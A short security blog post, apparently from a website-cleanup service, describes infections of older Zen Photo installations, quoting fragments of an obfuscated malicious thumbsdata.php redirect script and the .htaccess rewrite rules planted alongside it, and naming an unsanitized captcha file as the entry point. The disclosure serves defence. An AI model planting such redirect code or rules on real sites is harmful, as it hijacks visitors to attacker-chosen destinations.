New information on the Zen Photo exploit

While cleaning more websites with Zen Photo installed, we’re finding some new infections.

We’ve been seeing files added called thumbsdata.php. They usually have a string of code like this:

$vf=substr(1,1);foreach(array(10,100,111,99,117,109…{ $l = $_GET[“l”]; } @header(“Location: $l”); exit; }

This is accompanied by an .htaccess file in the same folder with lines similar to this:

ErrorDocument 400{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 401{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 403{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 404{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 500{HTTP_HOST}%{REQUEST_URI}

RewriteEngine On
RewriteRule !thumbsdata.php{HTTP_HOST}%{REQUEST_URI} [R=301,L]

We’ve seen other domains used as well, but this is just an example.

In the log files we’re seeing strings sent to the c.php file in the root of the Zen Photo installation. This file works with captcha, but apparently doesn’t sanitize the data.

Again, this is in older versions of Zen Photo.

Please update your Zen Photo websites immediately.

Post a comment here if you have more information.

If you need assistance in cleaning this up, please call me at (847)728-0214, Skype: wewatchyourwebsite or email me at:

Thank you.